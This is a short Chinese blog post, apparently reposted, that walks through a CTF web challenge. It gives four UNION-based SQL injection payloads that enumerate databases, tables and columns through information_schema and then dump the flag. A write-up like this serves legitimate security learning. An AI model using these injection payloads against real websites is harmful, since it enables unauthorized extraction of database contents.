首页 > 其他 > 详细

ctf实验平台-成绩单

时间:2017-11-28 01:15:00      阅读:695      评论:0      收藏:0      [点我收藏+]

 

题目链接:http://120.24.86.145:8002/chengjidan/

平台地址:http://123.206.31.85/

第一步:暴库

id=-1‘ union select 1,2,3,group_concat(schema_name) from information_schema.schemata#

技术分享图片

第二步:爆表

id=-1‘ union select 1,2,3,table_name from information_schema.tables where table_schema=0x736b6374665f666c6167#

技术分享图片

第三步:爆字段

id=-1‘ union select 1,2,3,column_name from information_schema.columns where table_name=0x666c3467#

技术分享图片

第四步:爆内容

id=-1‘ union select 1,2,3,group_concat(skctf_flag) from skctf_flag.fl4g#

技术分享图片

 本文固定链接:http://www.cnblogs.com/hell0w/p/7906711.html

ctf实验平台-成绩单

原文:http://www.cnblogs.com/hell0w/p/7906711.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!